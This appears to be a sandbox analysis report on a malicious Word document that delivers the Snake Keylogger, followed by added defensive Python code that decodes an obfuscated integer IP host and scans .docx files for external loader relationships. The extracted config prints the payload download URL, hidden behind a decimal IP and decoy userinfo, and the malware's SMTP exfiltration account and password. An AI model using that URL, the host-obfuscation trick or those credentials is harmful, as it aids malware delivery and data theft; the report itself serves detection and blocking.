General
Target: SCREENSHOT SWIFT MARCH.docx.doc
Size: 10KB
Sample: 230322-vsjlwscb3x
MD5: c0c359300612d9461aa517a963259d58
SHA1: 1c0150ee52c12ff1191d3283287ad42e1150b1ae
SHA256: e373c9158dd1c3dee8e680362ffa9e2e755ac6664b4785c06e5b7e207678f9b3
SHA512: 61256d7c26444d815d41883eec301ae4dbb60673e402cfea9389c4993c0a8b23fd02b3233daf7279b690034be243ffb89a0ca7f6ecd9a49012a18b45a5fb4651
SSDEEP: 192:ScIMmtP1aIG/bslPL++uOrj6l+CVWBXJC0c332:SPXU/slT+LOruHkZC9m
Static task: static1
Behavioral task: behavioral1
  Sample: SCREENSHOT SWIFT MARCH.docx
  Resource: win7-20230220-en
Behavioral task: behavioral2
  Sample: SCREENSHOT SWIFT MARCH.docx
  Resource: win10v2004-20230220-en
Malware Config
Extracted
URL: http://OASOSIDFOSWEROEROOWRWERWEREWWW0W83W338W83WOWRWWRWRWRW9W9R9W9R9WR9W9RW9R9W9R9W9R0WR7RR7W7RW7RRW7R66WSD6DSD6S6D6DSD66D6S@1755852395/19...............................19..............DOC
Extracted
Family: snakekeylogger
Protocol: smtp
Host: us2.smtp.mailhostbox.com
Port: 587
Username: 002@frem-tr.com
Password: jCXzqcP1 daniel 3116
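The host in the extracted download URL above is not a DNS name: it is an IPv4 address written as one decimal integer, and the authority is padded in front with a long bogus userinfo so the real destination is buried after the "@". Windows' URL stack and inet_addr accept integer hosts, so the document fetches from that address as written. The following is an added example, not code from the sandbox report or from the malware, that recovers the dotted-quad host from such a URL. EXTRACTED_URL is copied from the report with its truncated path kept exactly as shown; the conversion itself is plain arithmetic, and nothing here contacts the host.

```python
from ipaddress import IPv4Address
from urllib.parse import urlsplit

# Copied from the report's "Malware Config" section; the path is left truncated exactly as shown there.
EXTRACTED_URL = (
    "http://OASOSIDFOSWEROEROOWRWERWEREWWW0W83W338W83WOWRWWRWRWRW9W9R9W9R9WR9W9RW9R9W9R9W9R0WR7RR7W7RW7RRW7R66WSD6DSD6S6D6DSD66D6S"
    "@1755852395/19...............................19..............DOC"
)


def decode_host(host: str) -> str:
    """Turn an integer-form IPv4 host (decimal such as 1755852395, or hex such as 0x68a82e6b)
    into dotted-quad notation.  Dotted addresses and DNS names come back unchanged."""
    h = host.lower()
    if h.startswith("0x") and len(h) > 2:
        value = int(h, 16)
    elif h.isdigit():
        value = int(h, 10)
    else:
        return host
    if value > 0xFFFFFFFF:
        raise ValueError(f"{host!r} is not a 32-bit address")
    return str(IPv4Address(value))


def triage_url(url: str) -> dict:
    """Split a download URL into the fields an analyst needs for blocking and pivoting."""
    parts = urlsplit(url)
    raw_host = parts.hostname or ""
    host = decode_host(raw_host)
    return {
        "userinfo": parts.username,   # decoy padding before the '@'; only sent if the server demands auth
        "raw_host": raw_host,
        "host": host,                 # the address the OS resolver actually connects to
        "host_obfuscated": host != raw_host,
        "port": parts.port or (443 if parts.scheme == "https" else 80),
        "path": parts.path,
    }


if __name__ == "__main__":
    for key, value in triage_url(EXTRACTED_URL).items():
        print(f"{key:16} {value}")
```

Block the decoded address, not the literal string from the report: proxy and firewall rules that match on the decimal form miss the same host written as dotted quad or hex.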
Targets
Target: SCREENSHOT SWIFT MARCH.docx.doc
Size: 10KB
MD5: c0c359300612d9461aa517a963259d58
SHA1: 1c0150ee52c12ff1191d3283287ad42e1150b1ae
SHA256: e373c9158dd1c3dee8e680362ffa9e2e755ac6664b4785c06e5b7e207678f9b3
SHA512: 61256d7c26444d815d41883eec301ae4dbb60673e402cfea9389c4993c0a8b23fd02b3233daf7279b690034be243ffb89a0ca7f6ecd9a49012a18b45a5fb4651
SSDEEP: 192:ScIMmtP1aIG/bslPL++uOrj6l+CVWBXJC0c332:SPXU/slT+LOruHkZC9m
Score: 10/10
- Snake Keylogger payload
- Blocklisted process makes network request
- Downloads MZ/PE file
- Abuses OpenXML format to download file from external location
- Executes dropped EXE
- Loads dropped DLL
- Uses the VBS compiler for execution
- Accesses Microsoft Outlook profiles
- Looks up external IP address via web service
  Uses a legitimate IP lookup service to find the infected system's external IP.
- Drops file in System32 directory
- Suspicious use of SetThreadContext
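Of the behaviours listed, "Abuses OpenXML format to download file from external location" is the one that can be confirmed without detonating the file. A .docx is a ZIP of XML parts, each part's links live in a *.rels file, and a Relationship with TargetMode="External" is resolved by Word when the part loads; hyperlinks are normal there, while an external oleObject, attachedTemplate or frame target is how a document pulls a second stage. The following is an added example, not code from the sandbox or from the sample, that scans a package for such relationships. The report does not say which relationship type this sample used, so the in-memory document, its oleObject relationship and the target URL below are constructed for the demonstration (the decimal host only mirrors the trick seen in the report's extracted URL).

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Relationship types Word follows while rendering, i.e. fetches without the user clicking anything.
# Linked images are included because an external image is also a beacon to the attacker's server.
LOADER_TYPES = ("oleObject", "attachedTemplate", "frame", "image", "package")


def external_relationships(docx_bytes: bytes) -> list:
    """Return every TargetMode="External" relationship in an OOXML package (docx/xlsx/pptx)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            # xml.etree does not fetch external entities; for hostile input at scale prefer defusedxml.
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{REL_NS}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                hits.append({
                    "part": name,
                    "type": rel_type,
                    "target": rel.get("Target", ""),
                    "verdict": "suspicious" if rel_type in LOADER_TYPES else "info",
                })
    return hits


def build_sample_docx(target: str) -> bytes:
    """Constructed minimal .docx: one ordinary hyperlink plus one external oleObject (assumed shape)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/>'
            '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
            '</Types>')
        z.writestr("_rels/.rels",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
            '</Relationships>')
        z.writestr("word/document.xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body><w:p/></w:body></w:document>')
        z.writestr("word/_rels/document.xml.rels",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.example.com/" TargetMode="External"/>'
            f'<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="{target}" TargetMode="External"/>'
            '</Relationships>')
    return buf.getvalue()


# Constructed sample; the target URL is an assumption, not the one from the report.
SAMPLE = build_sample_docx("http://1755852395/payload.doc")

if __name__ == "__main__":
    for hit in external_relationships(SAMPLE):
        print(f'{hit["verdict"]:10} {hit["part"]}: {hit["type"]} -> {hit["target"]}')
```

Against a real file, pass the bytes of the .docx instead of SAMPLE. A "suspicious" hit with an http, https or file target is enough to block the host at the proxy before anyone opens the document; the hyperlink hit is the kind of external relationship every ordinary document carries.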